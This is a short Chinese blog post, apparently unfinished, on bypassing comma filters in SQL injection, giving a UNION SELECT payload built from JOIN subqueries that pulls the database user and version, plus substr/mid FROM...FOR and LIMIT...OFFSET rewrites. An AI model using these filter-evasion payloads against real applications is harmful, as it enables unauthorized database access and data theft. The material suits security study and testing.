SQL注入绕过

绕过逗号

  1. 使用join关键字
    select id,ip from client_ip where 1>2 union select from ((select user())a JOIN (select version())b);

    join基本使用例子:

image

  1. 使用 from 1 for 1
    select substr(database() from 1 for 1);
    select mid(database() from 1 for 1);

  2. 使用offset关键字
    select * from news limit 0,1
    等价于下面这条SQL语句
    select * from yang limit 1 offset 0

(未完,待续)

posted @ 2021-08-06 21:31  admax11  阅读(65)  评论(0编辑  收藏  举报